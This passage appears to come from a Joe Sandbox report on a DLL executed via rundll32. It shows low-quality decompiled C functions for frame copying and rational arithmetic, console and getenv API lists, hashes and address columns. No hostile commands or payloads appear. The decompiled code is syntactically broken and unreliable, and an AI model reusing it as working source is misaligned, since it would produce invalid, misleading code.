                                                                      																						__eflags = _t349 & 0x00000002;
                                                                      																						if((_t349 & 0x00000002) != 0) {
                                                                      																							 *_t338 =  *_t375 & 0x0000ffff;
                                                                      																							_t263 = 2;
                                                                      																						}
                                                                      																						__eflags = _t349 & 0x00000001;
                                                                      																						if((_t349 & 0x00000001) == 0) {
                                                                      																							L35:
                                                                      																							_t376 = 0;
                                                                      																							__eflags = 0;
                                                                      																						} else {
                                                                      																							_t376 = 0;
                                                                      																							 *((char*)(_t338 + _t263)) =  *(_t375 + _t263) & 0x000000ff;
                                                                      																						}
                                                                      																						return _t376;
                                                                      																						goto L113;
                                                                      																					} else {
                                                                      																						L28:
                                                                      																						memcpy(_t353, _t378, _t314);
                                                                      																						_t396 =  &(_t396[3]);
                                                                      																					}
                                                                      																					L38:
                                                                      																					__eflags = _t385 & 0x00000001;
                                                                      																					_t335 = _t385;
                                                                      																					_t309 = _t297;
                                                                      																					_t347 = 0x20;
                                                                      																					if((_t385 & 0x00000001) != 0) {
                                                                      																						_t335 = _t385 + 1;
                                                                      																						_t347 = 0x1f;
                                                                      																						_t309 = _t297 + 1;
                                                                      																						 *_t385 =  *_t297 & 0x000000ff;
                                                                      																					}
                                                                      																					__eflags = _t335 & 0x00000002;
                                                                      																					if((_t335 & 0x00000002) != 0) {
                                                                      																						_t257 =  *_t309 & 0x0000ffff;
                                                                      																						_t335 = _t335 + 2;
                                                                      																						_t309 =  &(_t309[1]);
                                                                      																						_t347 = _t347 - 2;
                                                                      																						 *(_t335 - 2) = _t257;
                                                                      																					}
                                                                      																					_t396[0xd] = _t297;
                                                                      																					_t258 = 0;
                                                                      																					_t373 = _t347 & 0xfffffffc;
                                                                      																					__eflags = _t373;
                                                                      																					do {
                                                                      																						 *(_t335 + _t258) =  *(_t309 + _t258);
                                                                      																						_t258 = _t258 + 4;
                                                                      																						__eflags = _t258 - _t373;
                                                                      																					} while (_t258 < _t373);
                                                                      																					_t336 = _t335 + _t258;
                                                                      																					_t310 = _t309 + _t258;
                                                                      																					_t300 = _t396[0xd];
                                                                      																					_t259 = 0;
                                                                      																					__eflags = _t347 & 0x00000002;
                                                                      																					if((_t347 & 0x00000002) != 0) {
                                                                      																						 *_t336 =  *_t310 & 0x0000ffff;
                                                                      																						_t259 = 2;
                                                                      																					}
                                                                      																					__eflags = _t347 & 0x00000001;
                                                                      																					if((_t347 & 0x00000001) != 0) {
                                                                      																						 *((char*)(_t336 + _t259)) =  *(_t310 + _t259) & 0x000000ff;
                                                                      																					}
                                                                      																					__eflags = _t385 & 0x00000001;
                                                                      																					_t349 = 0x20;
                                                                      																					_t337 = _t385 + 0x20;
                                                                      																					_t374 = _t300 + 0x20;
                                                                      																					if((_t385 & 0x00000001) != 0) {
                                                                      																						_t337 = _t385 + 0x21;
                                                                      																						_t349 = 0x1f;
                                                                      																						_t374 = _t300 + 0x21;
                                                                      																						 *(_t385 + 0x20) =  *(_t300 + 0x20) & 0x000000ff;
                                                                      																					}
                                                                      																					__eflags = _t337 & 0x00000002;
                                                                      																					if((_t337 & 0x00000002) != 0) {
                                                                      																						_t261 =  *_t374 & 0x0000ffff;
                                                                      																						_t337 = _t337 + 2;
                                                                      																						_t374 =  &(_t374[1]);
                                                                      																						_t349 = _t349 - 2;
                                                                      																						 *(_t337 - 2) = _t261;
                                                                      																					}
                                                                      																					_t262 = 0;
                                                                      																					_t302 = _t349 & 0xfffffffc;
                                                                      																					__eflags = _t302;
                                                                      																					do {
                                                                      																						 *(_t337 + _t262) =  *(_t374 + _t262);
                                                                      																						_t262 = _t262 + 4;
                                                                      																						__eflags = _t262 - _t302;
                                                                      																					} while (_t262 < _t302);
                                                                      																					goto L50;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																	} else {
                                                                      																		 *_t396 = _t255;
                                                                      																		_t273 = L10009FC0(_t297, _t308);
                                                                      																		 *(_t385 + 0x128) = _t273;
                                                                      																		__eflags = _t273;
                                                                      																		if(_t273 == 0) {
                                                                      																			goto L19;
                                                                      																		} else {
                                                                      																			goto L24;
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	_t308 = 4;
                                                                      																	_t396[1] = 4;
                                                                      																	 *_t396 =  *(_t297 + 0xdc);
                                                                      																	_t275 = E100291F0();
                                                                      																	 *((intOrPtr*)(_t385 + 0xd8)) = _t275;
                                                                      																	if(_t275 == 0) {
                                                                      																		goto L19;
                                                                      																	} else {
                                                                      																		_t339 =  *(_t297 + 0xdc);
                                                                      																		 *(_t385 + 0xdc) = _t339;
                                                                      																		if(_t339 <= 0) {
                                                                      																			goto L22;
                                                                      																		} else {
                                                                      																			_t396[0xc] = _t385;
                                                                      																			_t388 = _t297;
                                                                      																			_t304 = 0;
                                                                      																			while(1) {
                                                                      																				_t381 = _t304 * 4;
                                                                      																				 *_t396 =  *( *((intOrPtr*)(_t388 + 0xd8)) + _t381);
                                                                      																				 *((intOrPtr*)(_t275 + _t381)) = L10009FC0(_t304, _t308);
                                                                      																				_t275 =  *((intOrPtr*)(_t396[0xc] + 0xd8));
                                                                      																				if( *((intOrPtr*)(_t275 + _t381)) == 0) {
                                                                      																					break;
                                                                      																				}
                                                                      																				_t304 = _t304 + 1;
                                                                      																				__eflags =  *((intOrPtr*)(_t388 + 0xdc)) - _t304;
                                                                      																				if( *((intOrPtr*)(_t388 + 0xdc)) <= _t304) {
                                                                      																					_t297 = _t388;
                                                                      																					_t385 = _t396[0xc];
                                                                      																					goto L22;
                                                                      																				} else {
                                                                      																					continue;
                                                                      																				}
                                                                      																				goto L113;
                                                                      																			}
                                                                      																			_t385 = _t396[0xc];
                                                                      																			goto L19;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															 *_t396 = _t254;
                                                                      															_t280 = L10009FC0(_t297, _t308);
                                                                      															 *((intOrPtr*)(_t385 + 0xb8 + _t370 * 4)) = _t280;
                                                                      															if(_t280 == 0) {
                                                                      																L19:
                                                                      																_t368 = 0xfffffff4;
                                                                      																goto L20;
                                                                      															} else {
                                                                      																goto L11;
                                                                      															}
                                                                      														}
                                                                      														goto L113;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									goto L68;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L113:
                                                                      			}











































































                                                                      0x1001e795
                                                                      0x1001e79b
                                                                      0x1001e79f
                                                                      0x1001e79f
                                                                      0x1001e793
                                                                      0x1001e780
                                                                      0x1001e76e
                                                                      0x1001e6ae
                                                                      0x1001e6b1
                                                                      0x1001e6b4
                                                                      0x1001e6b7
                                                                      0x1001e6bc
                                                                      0x1001e6c2
                                                                      0x1001e6c4
                                                                      0x1001e750
                                                                      0x1001e750
                                                                      0x00000000
                                                                      0x1001e6ca
                                                                      0x1001e6ca
                                                                      0x1001e6cf
                                                                      0x1001e6d3
                                                                      0x1001e6d5
                                                                      0x00000000
                                                                      0x1001e6d7
                                                                      0x1001e6d7
                                                                      0x1001e6dd
                                                                      0x1001e6e4
                                                                      0x1001e6e7
                                                                      0x1001e6ea
                                                                      0x1001e6ef
                                                                      0x1001e6f1
                                                                      0x1001e7a0
                                                                      0x1001e7a0
                                                                      0x1001e7a8
                                                                      0x1001e7ab
                                                                      0x1001e7b9
                                                                      0x1001e6f7
                                                                      0x1001e6fd
                                                                      0x1001e700
                                                                      0x1001e708
                                                                      0x1001e70c
                                                                      0x1001e711
                                                                      0x1001e713
                                                                      0x00000000
                                                                      0x1001e719
                                                                      0x1001e719
                                                                      0x1001e722
                                                                      0x1001e72b
                                                                      0x1001e72f
                                                                      0x1001e733
                                                                      0x1001e736
                                                                      0x1001e73f
                                                                      0x1001e742
                                                                      0x1001e747
                                                                      0x1001e755
                                                                      0x1001e75a
                                                                      0x1001e75a
                                                                      0x1001e713
                                                                      0x1001e6f1
                                                                      0x1001e6d5
                                                                      0x1001e6c4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001e510
                                                                      0x1001e508
                                                                      0x1001e500
                                                                      0x1001e4fb
                                                                      0x1001e4de
                                                                      0x1001e4ce
                                                                      0x1001e4b2
                                                                      0x1001e4b2
                                                                      0x1001e4b5
                                                                      0x1001e5d0
                                                                      0x1001e5d0
                                                                      0x1001e5d6
                                                                      0x1001e5d8
                                                                      0x1001e632
                                                                      0x1001e635
                                                                      0x1001e63a
                                                                      0x1001e63f
                                                                      0x1001e643
                                                                      0x1001e64c
                                                                      0x1001e537
                                                                      0x1001e54a
                                                                      0x1001e5da
                                                                      0x1001e5da
                                                                      0x1001e5e0
                                                                      0x1001e5e5
                                                                      0x1001e5e9
                                                                      0x1001e5ed
                                                                      0x1001e5ef
                                                                      0x1001e5f3
                                                                      0x1001e5f7
                                                                      0x1001e5fb
                                                                      0x1001e5ff
                                                                      0x1001bc40
                                                                      0x1001bc41
                                                                      0x1001bc42
                                                                      0x1001bc44
                                                                      0x1001bc47
                                                                      0x1001bc4b
                                                                      0x1001bc52
                                                                      0x1001bc5e
                                                                      0x1001bc64
                                                                      0x1001bc6a
                                                                      0x1001bc70
                                                                      0x1001bc79
                                                                      0x1001bc85
                                                                      0x1001bc8b
                                                                      0x1001bc91
                                                                      0x1001bc9b
                                                                      0x1001bc9d
                                                                      0x1001bca3
                                                                      0x1001bcad
                                                                      0x1001be70
                                                                      0x1001be7a
                                                                      0x1001be7e
                                                                      0x1001be81
                                                                      0x1001bcb3
                                                                      0x1001bcb9
                                                                      0x1001bcc1
                                                                      0x1001bcc1
                                                                      0x1001bcad
                                                                      0x1001bcc7
                                                                      0x1001bccd
                                                                      0x1001bcd4
                                                                      0x1001bcd6
                                                                      0x1001bdb8
                                                                      0x1001bdba
                                                                      0x1001bdc8
                                                                      0x1001bcdc
                                                                      0x1001bcdc
                                                                      0x1001bce6
                                                                      0x1001be40
                                                                      0x1001be4a
                                                                      0x1001be4d
                                                                      0x1001be52
                                                                      0x1001be54
                                                                      0x1001be56
                                                                      0x00000000
                                                                      0x1001be5c
                                                                      0x1001be5c
                                                                      0x1001be62
                                                                      0x1001be64
                                                                      0x00000000
                                                                      0x1001be6a
                                                                      0x00000000
                                                                      0x1001be6a
                                                                      0x1001be64
                                                                      0x1001bcec
                                                                      0x1001bcec
                                                                      0x1001bcf4
                                                                      0x1001be90
                                                                      0x1001be90
                                                                      0x1001be95
                                                                      0x1001be99
                                                                      0x1001be9e
                                                                      0x1001bea0
                                                                      0x1001bea2
                                                                      0x00000000
                                                                      0x1001bea8
                                                                      0x1001bea8
                                                                      0x1001beac
                                                                      0x1001beaf
                                                                      0x1001beb4
                                                                      0x1001beb6
                                                                      0x1001beb8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001beb8
                                                                      0x1001bcfa
                                                                      0x1001bcfa
                                                                      0x1001bcfa
                                                                      0x00000000
                                                                      0x1001bd07
                                                                      0x1001bd09
                                                                      0x1001bd22
                                                                      0x1001bd22
                                                                      0x1001bd26
                                                                      0x1001bd00
                                                                      0x00000000
                                                                      0x1001bd28
                                                                      0x1001bd30
                                                                      0x1001bdd6
                                                                      0x1001bdd6
                                                                      0x1001bddc
                                                                      0x1001bdde
                                                                      0x1001bdf2
                                                                      0x1001bdf2
                                                                      0x1001bdf5
                                                                      0x1001bed0
                                                                      0x00000000
                                                                      0x1001bdfb
                                                                      0x1001bdfb
                                                                      0x1001be01
                                                                      0x1001be06
                                                                      0x1001be08
                                                                      0x00000000
                                                                      0x1001be0a
                                                                      0x1001be0a
                                                                      0x1001be0e
                                                                      0x1001be15
                                                                      0x1001be1a
                                                                      0x1001be1d
                                                                      0x1001be1f
                                                                      0x00000000
                                                                      0x1001be21
                                                                      0x1001be21
                                                                      0x1001be28
                                                                      0x1001be2b
                                                                      0x1001be2d
                                                                      0x1001be30
                                                                      0x1001bf96
                                                                      0x1001bf98
                                                                      0x1001c033
                                                                      0x1001c036
                                                                      0x1001c037
                                                                      0x1001c038
                                                                      0x1001c039
                                                                      0x1001c039
                                                                      0x1001bf9e
                                                                      0x1001bfa4
                                                                      0x1001c01e
                                                                      0x1001c021
                                                                      0x1001c024
                                                                      0x1001c027
                                                                      0x1001c02a
                                                                      0x1001c02a
                                                                      0x1001bfa6
                                                                      0x1001bfac
                                                                      0x00000000
                                                                      0x1001bfb2
                                                                      0x1001bfb4
                                                                      0x1001bfbd
                                                                      0x1001bfc0
                                                                      0x1001bfc0
                                                                      0x00000000
                                                                      0x1001bfc0
                                                                      0x1001bf66
                                                                      0x1001bf66
                                                                      0x1001bf68
                                                                      0x1001bf6a
                                                                      0x1001bf6c
                                                                      0x1001bf72
                                                                      0x1001bf77
                                                                      0x1001bf7a
                                                                      0x1001bf7a
                                                                      0x1001bf7f
                                                                      0x1001bf82
                                                                      0x1001bebe
                                                                      0x1001bebe
                                                                      0x1001bebe
                                                                      0x1001bf88
                                                                      0x1001bf8c
                                                                      0x1001bf8e
                                                                      0x1001bf8e
                                                                      0x1001bec9
                                                                      0x00000000
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001be36
                                                                      0x1001bed3
                                                                      0x1001bed3
                                                                      0x1001bed9
                                                                      0x1001bedb
                                                                      0x1001bedd
                                                                      0x1001bee2
                                                                      0x1001bfdf
                                                                      0x1001bfe2
                                                                      0x1001bfe7
                                                                      0x1001bfea
                                                                      0x1001bfea
                                                                      0x1001bee8
                                                                      0x1001beeb
                                                                      0x1001bfc7
                                                                      0x1001bfca
                                                                      0x1001bfcd
                                                                      0x1001bfd0
                                                                      0x1001bfd3
                                                                      0x1001bfd3
                                                                      0x1001bef1
                                                                      0x1001bef7
                                                                      0x1001bef9
                                                                      0x1001bef9
                                                                      0x1001befc
                                                                      0x1001beff
                                                                      0x1001bf02
                                                                      0x1001bf05
                                                                      0x1001bf05
                                                                      0x1001bf09
                                                                      0x1001bf0b
                                                                      0x1001bf0d
                                                                      0x1001bf11
                                                                      0x1001bf13
                                                                      0x1001bf19
                                                                      0x1001bf1e
                                                                      0x1001bf21
                                                                      0x1001bf21
                                                                      0x1001bf26
                                                                      0x1001bf29
                                                                      0x1001bf2f
                                                                      0x1001bf2f
                                                                      0x1001bf32
                                                                      0x1001bf38
                                                                      0x1001bf3d
                                                                      0x1001bf40
                                                                      0x1001bf43
                                                                      0x1001c00b
                                                                      0x1001c00e
                                                                      0x1001c013
                                                                      0x1001c016
                                                                      0x1001c016
                                                                      0x1001bf49
                                                                      0x1001bf4c
                                                                      0x1001bff2
                                                                      0x1001bff5
                                                                      0x1001bff8
                                                                      0x1001bffb
                                                                      0x1001bffe
                                                                      0x1001bffe
                                                                      0x1001bf54
                                                                      0x1001bf56
                                                                      0x1001bf56
                                                                      0x1001bf59
                                                                      0x1001bf5c
                                                                      0x1001bf5f
                                                                      0x1001bf62
                                                                      0x1001bf62
                                                                      0x00000000
                                                                      0x1001bf59
                                                                      0x1001be1f
                                                                      0x1001be08
                                                                      0x1001bde0
                                                                      0x1001bde0
                                                                      0x1001bde3
                                                                      0x1001bde8
                                                                      0x1001bdee
                                                                      0x1001bdf0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      • Failed to map frame into derived frame context: %d., xrefs: 1001E71D
                                                                      • Invalid mapping found when attempting unmap., xrefs: 1001E635
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_frame_unref
                                                                      • String ID: Failed to map frame into derived frame context: %d.$Invalid mapping found when attempting unmap.
                                                                      • API String ID: 3522828444-968520014
                                                                      • Opcode ID: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
                                                                      • Instruction ID: 1d7c3b7aca9d3417cd3ea7e1bcd086570995cae0267e84f3f0b04429ecccd582
                                                                      • Opcode Fuzzy Hash: a8cee79f1116f489e9366e10ea9b5597fa9099dcfd39c1eecab353edc7ebc651
                                                                      • Instruction Fuzzy Hash: F991A0B4A09B418FC744DF29C58051EBBE1FF88794F55896DE8998B351E730ED81CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 22%
                                                                      			E10010320(intOrPtr* _a4) {
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v52;
                                                                      				signed int _v56;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t97;
                                                                      				signed int _t100;
                                                                      				signed int _t106;
                                                                      				signed int _t112;
                                                                      				signed int _t118;
                                                                      				signed int _t124;
                                                                      				signed int _t130;
                                                                      				signed int _t136;
                                                                      				signed int _t139;
                                                                      				signed int _t147;
                                                                      				intOrPtr _t148;
                                                                      				intOrPtr _t149;
                                                                      				intOrPtr _t150;
                                                                      				intOrPtr _t151;
                                                                      				intOrPtr _t152;
                                                                      				intOrPtr _t153;
                                                                      				signed int _t154;
                                                                      				signed int _t158;
                                                                      				signed int _t172;
                                                                      				signed int _t174;
                                                                      				signed int _t176;
                                                                      				signed int _t178;
                                                                      				signed int _t180;
                                                                      				signed int _t182;
                                                                      				signed int _t184;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      				intOrPtr* _t188;
                                                                      				intOrPtr* _t189;
                                                                      				signed int _t199;
                                                                      				void* _t200;
                                                                      				intOrPtr* _t201;
                                                                      
                                                                      				_t188 = 0x100b3200;
                                                                      				_t201 = _t200 - 0x2c;
                                                                      				_v40 = 0;
                                                                      				_t189 = _a4;
                                                                      				while(1) {
                                                                      					_v40 = _v40 + 1;
                                                                      					_t188 = _t188 + 0x40;
                                                                      					if(_v40 == 0x17) {
                                                                      						break;
                                                                      					}
                                                                      					_t6 = _t188 + 0x10; // 0x1000ffb0
                                                                      					if( *_t6 == 0) {
                                                                      						continue;
                                                                      					} else {
                                                                      						_t9 = _t188 + 0x10; // 0x1000ffb0
                                                                      						_t10 = _t188 + 0x14; // 0x10010008
                                                                      						_t172 =  *_t10;
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x10));
                                                                      						_v56 =  *((intOrPtr*)(_t189 + 0x14));
                                                                      						_v52 =  *_t9;
                                                                      						_v48 = _t172;
                                                                      						_t97 = L10035A10( *((intOrPtr*)(_t189 + 0x14)), _t188, _t189);
                                                                      						_t147 = _t172;
                                                                      						_t14 = _t188 + 0x1c; // 0x1000fde8
                                                                      						_t192 =  <  ? _t97 :  ~_t97;
                                                                      						_t15 = _t188 + 0x18; // 0x10010060
                                                                      						_v48 =  *_t14;
                                                                      						_v52 =  *_t15;
                                                                      						_t174 =  *((intOrPtr*)(_t189 + 0x1c));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x18));
                                                                      						_v56 = _t174;
                                                                      						_t100 = L10035A10(_t147, _t188, _t189);
                                                                      						 *_t201 =  <  ? _t97 :  ~_t97;
                                                                      						_v56 = _t147;
                                                                      						_v48 = _t174;
                                                                      						_t102 =  <  ? _t100 :  ~_t100;
                                                                      						_v52 =  <  ? _t100 :  ~_t100;
                                                                      						_t148 = L10035990(_t147, _t189);
                                                                      						_t24 = _t188 + 0x20; // 0x1000fe50
                                                                      						_t25 = _t188 + 0x24; // 0x0
                                                                      						_v52 =  *_t24;
                                                                      						_v48 =  *_t25;
                                                                      						_t176 =  *((intOrPtr*)(_t189 + 0x24));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x20));
                                                                      						_v56 = _t176;
                                                                      						_t106 = L10035A10(_t148, _t188, _t189);
                                                                      						 *_t201 = _t148;
                                                                      						_v56 = _t174;
                                                                      						_v48 = _t176;
                                                                      						_t108 =  <  ? _t106 :  ~_t106;
                                                                      						_v52 =  <  ? _t106 :  ~_t106;
                                                                      						_t149 = L10035990(_t148, _t189);
                                                                      						_t34 = _t188 + 0x28; // 0x0
                                                                      						_t35 = _t188 + 0x2c; // 0x0
                                                                      						_v52 =  *_t34;
                                                                      						_v48 =  *_t35;
                                                                      						_t178 =  *((intOrPtr*)(_t189 + 0x2c));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x28));
                                                                      						_v56 = _t178;
                                                                      						_t112 = L10035A10(_t149, _t188, _t189);
                                                                      						 *_t201 = _t149;
                                                                      						_v56 = _t176;
                                                                      						_v48 = _t178;
                                                                      						_t114 =  <  ? _t112 :  ~_t112;
                                                                      						_v52 =  <  ? _t112 :  ~_t112;
                                                                      						_t150 = L10035990(_t149, _t189);
                                                                      						_t44 = _t188 + 0x30; // 0x0
                                                                      						_t45 = _t188 + 0x34; // 0x0
                                                                      						_v52 =  *_t44;
                                                                      						_v48 =  *_t45;
                                                                      						_t180 =  *((intOrPtr*)(_t189 + 0x34));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x30));
                                                                      						_v56 = _t180;
                                                                      						_t118 = L10035A10(_t150, _t188, _t189);
                                                                      						 *_t201 = _t150;
                                                                      						_v56 = _t178;
                                                                      						_v48 = _t180;
                                                                      						_t120 =  <  ? _t118 :  ~_t118;
                                                                      						_v52 =  <  ? _t118 :  ~_t118;
                                                                      						_t151 = L10035990(_t150, _t189);
                                                                      						_t54 = _t188 + 0x38; // 0x0
                                                                      						_t55 = _t188 + 0x3c; // 0x0
                                                                      						_v52 =  *_t54;
                                                                      						_v48 =  *_t55;
                                                                      						_t182 =  *((intOrPtr*)(_t189 + 0x3c));
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 0x38));
                                                                      						_v56 = _t182;
                                                                      						_t124 = L10035A10(_t151, _t188, _t189);
                                                                      						 *_t201 = _t151;
                                                                      						_v56 = _t180;
                                                                      						_v48 = _t182;
                                                                      						_t126 =  <  ? _t124 :  ~_t124;
                                                                      						_v52 =  <  ? _t124 :  ~_t124;
                                                                      						_t152 = L10035990(_t151, _t189);
                                                                      						_t64 = _t188 + 4; // 0x1000fea8
                                                                      						_v52 =  *_t188;
                                                                      						_v48 =  *_t64;
                                                                      						_t184 =  *(_t189 + 4);
                                                                      						 *_t201 =  *_t189;
                                                                      						_v56 = _t184;
                                                                      						_t130 = L10035A10(_t152, _t188, _t189);
                                                                      						 *_t201 = _t152;
                                                                      						_v56 = _t182;
                                                                      						_v48 = _t184;
                                                                      						_t132 =  <  ? _t130 :  ~_t130;
                                                                      						_v52 =  <  ? _t130 :  ~_t130;
                                                                      						_t153 = L10035990(_t152, _t189);
                                                                      						_t72 = _t188 + 8; // 0x1000ff00
                                                                      						_t73 = _t188 + 0xc; // 0x1000ff58
                                                                      						_v52 =  *_t72;
                                                                      						_v48 =  *_t73;
                                                                      						_t186 =  *(_t189 + 0xc);
                                                                      						 *_t201 =  *((intOrPtr*)(_t189 + 8));
                                                                      						_v56 = _t186;
                                                                      						_t136 = L10035A10(_t153, _t188, _t189);
                                                                      						 *_t201 = _t153;
                                                                      						_v56 = _t184;
                                                                      						_v48 = _t186;
                                                                      						_t138 =  <  ? _t136 :  ~_t136;
                                                                      						_v52 =  <  ? _t136 :  ~_t136;
                                                                      						_t139 = L10035990(_t153, _t189);
                                                                      						_v36 = _t186;
                                                                      						_t154 = _t139;
                                                                      						_t199 = _t186;
                                                                      						_v32 = _t186 >> 0x1f;
                                                                      						_t187 = 0x3e8 * _t154 >> 0x20;
                                                                      						asm("sbb edx, [esp+0x1c]");
                                                                      						if((_t187 | 0x000003e8 * _t154 - _v36) != 0) {
                                                                      							_t158 = (_v32 ^ _t187) >> 0x0000001f | 0x00000001;
                                                                      							goto L7;
                                                                      						} else {
                                                                      							if(_t199 != 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t154 == 0) {
                                                                      									L8:
                                                                      									return _v40;
                                                                      								} else {
                                                                      									_t158 = _t154 >> 0x1f;
                                                                      									L7:
                                                                      									if(_t158 + 1 != 0) {
                                                                      										continue;
                                                                      									} else {
                                                                      										goto L8;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L11:
                                                                      				}
                                                                      				_v40 = 2;
                                                                      				return _v40;
                                                                      				goto L11;
                                                                      			}
                                                                      0x100104b2
                                                                      0x100104bb
                                                                      0x100104c1
                                                                      0x100104c4
                                                                      0x100104c8
                                                                      0x100104ce
                                                                      0x100104d1
                                                                      0x100104d4
                                                                      0x100104d8
                                                                      0x100104dd
                                                                      0x100104e0
                                                                      0x100104e4
                                                                      0x100104ec
                                                                      0x100104ef
                                                                      0x100104f8
                                                                      0x100104fc
                                                                      0x100104ff
                                                                      0x10010502
                                                                      0x10010506
                                                                      0x1001050d
                                                                      0x10010510
                                                                      0x10010513
                                                                      0x10010517
                                                                      0x1001051c
                                                                      0x1001051f
                                                                      0x10010523
                                                                      0x1001052b
                                                                      0x1001052e
                                                                      0x10010532
                                                                      0x10010537
                                                                      0x1001053b
                                                                      0x10010542
                                                                      0x10010544
                                                                      0x1001054d
                                                                      0x10010553
                                                                      0x1001055b
                                                                      0x10010591
                                                                      0x00000000
                                                                      0x1001055d
                                                                      0x1001055f
                                                                      0x00000000
                                                                      0x10010565
                                                                      0x10010567
                                                                      0x10010576
                                                                      0x10010581
                                                                      0x10010569
                                                                      0x10010569
                                                                      0x1001056c
                                                                      0x10010570
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10010570
                                                                      0x10010567
                                                                      0x1001055f
                                                                      0x1001055b
                                                                      0x00000000
                                                                      0x10010359
                                                                      0x100105a5
                                                                      0x100105b4
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_sub_q$mv_add_q$mv_reduce
                                                                      • String ID:
                                                                      • API String ID: 416313997-0
                                                                      • Opcode ID: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
                                                                      • Instruction ID: 2bd5eacdd0496173cebd80a3581587597599a29e230854eb82bb207fe0e5f862
                                                                      • Opcode Fuzzy Hash: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
                                                                      • Instruction Fuzzy Hash: 0281A1B4A08B069FC748DF6AD18051AFBE1FF88211F50C92EE59DC7721E670E8519F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetConsoleTextAttribute.KERNEL32 ref: 1002581C
                                                                        • Part of subcall function 10025640: WriteConsoleW.KERNEL32 ref: 1002570D
                                                                      • SetConsoleTextAttribute.KERNEL32 ref: 1002583B
                                                                      • getenv.MSVCRT ref: 1002588F
                                                                      • GetStdHandle.KERNEL32 ref: 1002589D
                                                                      • GetConsoleMode.KERNEL32 ref: 100258BB
                                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 100258E1
                                                                      • getenv.MSVCRT ref: 10025907
                                                                      • getenv.MSVCRT ref: 10025924
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
